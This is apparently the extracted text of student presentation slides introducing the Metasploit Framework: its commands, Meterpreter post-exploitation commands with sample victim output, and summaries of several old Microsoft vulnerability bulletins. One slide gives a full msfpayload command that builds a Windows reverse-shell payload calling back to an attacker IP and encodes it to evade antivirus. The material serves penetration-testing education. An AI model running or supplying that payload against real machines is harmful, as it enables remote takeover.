MetasploitFramework

Lê Đức Quyền 08130075Cao Ngô Nhật thanh 08130081

What is Metasploit?

• “The Metasploit Framework is an advanced open-source

for attacking, testing, and using exploit code.”

•  Metasploit software helps security and IT professionals

identify security issues, verify vulnerability in system.

• Perform penetration tests

• Overt penetration testing

• Covert penetration testing

• Consists of tools, libraries, modules, and user

interfaces. These are configured and combined to

launch an exploit.

• Written in Ruby.

• Professional approach to penetration testing:– Automation– Reconnaissance, exploitation.

• All in one Solution– Multi-platform– Diverse range of target applications

• Open Source– Custom payloads

Motivation

Metasploit Architecture

• Choose module exploit:

• show exploits: list available exploits within the framework

• use exploit_name: choose exploit

• info exploit_name: view information about exploit

• Choose payload

• Show payloads: show only the payloads that are com-patible with

chosen module.

• Info payload_name: view detail information about payload

• set payload payload_name: choose payload

Metaploit Framework Command

Metaploit framwork command

• Configure chosen payload.

• show options: view the options which you must configure

• set option_name value: configure option

• show advanceds: show advance options

• check: verify options are configured whether exactly or not

• show targets: list vulnerable potential targets.

• set TARGET value: choose target.

• exploit: initiates our exploit and attempts to attack the target

Meterpreter Meterpreter, short for The Meta -Interpreter is an

advanced payload that is included in the Metaploit

Framework. Its purpose is to provide complex command

for exploiting and attacking remote machine. The way that

it accomplishes this is by allowing developers to write their

own extensions in the form of shared object (DLL) files

that can be uploaded and injected into a running process

on a target computer after exploitation has occurred.

Meterpreter payload

• Fs: Provides interaction with the filesystem on the remote machine.

• Net: Provides interaction with the network stack on the remote machine.

• Process: Provides interaction with processes on the remote machine .

• Sys: Provides interaction with the environment on the remote machine

Basic Meterpreter Command

• screenshot: capture desktop screen of victim

• sysinfo: view information about platform of

victim

• meterpreter > sysinfo

Computer: IHAZSECURITY

OS : Windows XP (Build 2600, Service Pack

2).

Arch : x86

Language: en_US

Basic Meterpreter Command

• execute: executes a process on the remote

endpoint

• kill: terminate one or more processes on the

remote endpoint

• Ps: list processes on the remote endpoint

Basic meterpreter command

Meterpreter> execute -f cmd –c                 execute: success, process id is 3516.       execute: allocated channel 1 for new process.meterpreter> interact 1                              interact: Switching to interactive

console on 1...                              interact: Started interactive

channel 1.                              Microsoft Windows XP [Version

5.1.2600]                             (C) Copyright 1985-2001 Microsoft

Corp.      C:\WINDOWS>ipconfig

Avoiding detection

• Encoding payload with MSFencode

root@bt:/# msfpayload windows/shell_reverse_tcp

LHOST=192.168.1.101 LPORT=31337 R |msfencode -e

x86/shikata_ga_nai -t exe > /var/www/payload2.exe

• Multi-encoding: allows the payload to be encoded several

times to throw off antivirus programs

Critical vulnerability

MS08-067 - Critical• Vulnerability in Server Service Could Allow Remote

Code Execution (958644)• The vulnerability could allow remote code execution if an

affected system received a specially crafted RPC request. On Microsoft Windows 2000, Windows XP, and Windows Server 2003 systems, an attacker could exploit this vulnerability without authentication to run arbitrary code.

• Firewall best practices and standard default firewall configurations can help protect network resources from attacks that originate outside the enterprise perimeter. http://technet.microsoft.com/en-us/security/bulletin/ms08-067

MS04-011-CriticalLSASS Vulnerability - CAN-2003-0533

Impact of vulnerability: Remote Code Execution

An attacker who successfully exploited the most severe of

these vulnerabilities could take complete control of an

affected system, including installing programs; viewing,

changing, or deleting data; or creating new accounts that

have full privileges.

This vulnerability is caused by an unchecked buffer in the

LSASS service.

http://technet.microsoft.com/en-us/security/bulletin/ms04-0

11

MS10-061 - Critical• This is a remote code execution vulnerability. An attacker who successfully

exploited this vulnerability could take complete control of an affected

system. An attacker could then install programs; view, change, or delete

data; or create new accounts.

• Systems are only vulnerable to remote attack when sharing a printer and

the remote attacker can access the printer share.

• This vulnerability is caused when the Windows Print Spooler insufficiently

restricts user permissions to access print spoolers.

• Firewall best practices and standard default firewall configurations can help

protect networks from attacks that originate outside the enterprise

perimeter. Best practices recommend that systems that are connected to

the Internet have a minimal number of ports exposed.

• http://technet.microsoft.com/en-us/security/bulletin/MS10-061

MS03-026-Critical• This vulnerability is caused by the Windows RPCSS service does not

properly check message inputs under certain circumstances. After

establishing a connection, an attacker could send a specially crafted

malformed RPC message to cause the underlying Distributed Component

Object Model (DCOM) process on the remote system to fail in such a way

that arbitrary code could be executed.

• To exploit this vulnerability, the attacker would require the ability to send a

specially crafted request to port 135, 139, 445 or 593 or any other

specifically configured RPC port on the remote machine. 

• Best practices recommend blocking all TCP/IP ports that are not actually

being used

• A remote code execution vulnerability exists in the ActiveX control for the Snapshot Viewer for Microsoft Access. An attacker could exploit the vulnerability by constructing a specially crafted Web page. When a user views the Web page, the vulnerability could allow remote code execution. An attacker who successfully exploited this vulnerability could gain the same user rights as the logged-on user.

• http://technet.microsoft.com/en-us/security/bulletin/MS08-041

MS10-046 - Critical

DEMO